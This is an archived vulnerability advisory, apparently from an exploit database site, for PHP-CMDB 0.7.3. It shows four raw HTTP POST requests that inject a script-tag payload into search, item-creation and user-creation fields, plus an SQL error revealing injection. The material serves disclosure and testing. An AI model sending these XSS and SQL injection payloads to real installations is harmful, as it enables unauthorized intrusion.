PHP-CMDB 0.7.3 Cross Site Scripting / SQL Injection

PHP-CMDB 0.7.3 Cross Site Scripting / SQL Injection: Posted Feb 27, 2014; Authored by HauntIT; PHP-CMDB version 0.7.3 suffers from cross site scripting and remote SQL injection vulnerabilities.; tags | exploit, remote, php, vulnerability, xss, sql injection; SHA-256 | a67d8b34f99f51d05ba0d86b8dd9d16c2587342e99d7267c8f8f0d015c02ef63; Download | Favorite | View

PHP-CMDB 0.7.3 Cross Site Scripting / SQL Injection

# ==============================================================
# Title ...| Multiple vulnerabilities in PHP-CMDB
# Version .| php-cmdb_0.7.3
# Date ....| 27.02.2014
# Found ...| HauntIT Blog
# Home ....| 
# ==============================================================

[+] From admin logged-in
 

# ==============================================================
# 1. XSS in SQL error

---<request>---
POST /k/cms/php-cmdb/php-cmdb_0.7.3/www/index.php HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 57

s_text='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&s_form=1
---<request>---


---<response>---
<td colspan='2' class='c_attr r_attr'>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"><body/onload=alert(9999)>%' AND ci_cit_id=cit_id ORDER BY ci_title, cit_title' at line 1</td>
</tr>
---<response>---

Same parameter seems to be vulnerable to SQL Injection attack.
("The used SELECT statements have a different number of columns")

# ==============================================================
# 2. XSS

---<request>---
POST /k/cms/php-cmdb/php-cmdb_0.7.3/www/ci_create.php HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 93

ci_id=0&ci_clone_id=0&ci_icon='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&ci_form=1&ci_cit_id=0
---<request>---



# ==============================================================
# 3. XSS /SQLi 

---<request>---
POST /k/cms/php-cmdb/php-cmdb_0.7.3/www/search_advanced.php HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 100

s_form=2&s_text='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&s_cit_id=0&s_cat_id=0&s_compare_operator=0
---<request>---


# ==============================================================
# 4. XSS / SQLi

---<request>---
POST /k/cms/php-cmdb/php-cmdb_0.7.3/www/u_create_run.php HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 153

u_id=0&u_form=1&u_login='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&u_active=1&u_last_name=tester&u_first_name=tester&u_role_id=1&u_email=&u_auth_backend=0
---<request>---



# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/

Top Authors In Last 30 Days

Red Hat 269 files
Ubuntu 99 files
Gentoo 29 files
indoushka 19 files
Debian 17 files
Sina Kheirkhah 7 files
tmrswrr 7 files
Rodolfo Tavares 4 files
jheysel-r7 2 files
Pierre Kim 2 files

File Archives

Systems

AIX (429)
Apple (2,090)
BSD (377)
CentOS (58)
Cisco (1,927)
Debian (7,082)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,534)
HPUX (880)
iOS (376)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,505)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,383)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,686)
UNIX (9,430)
UnixWare (187)
Windows (6,667)
Other

PHP-CMDB 0.7.3 Cross Site Scripting / SQL Injection

PHP-CMDB 0.7.3 Cross Site Scripting / SQL Injection

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

PHP-CMDB 0.7.3 Cross Site Scripting / SQL Injection

Share This

PHP-CMDB 0.7.3 Cross Site Scripting / SQL Injection

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems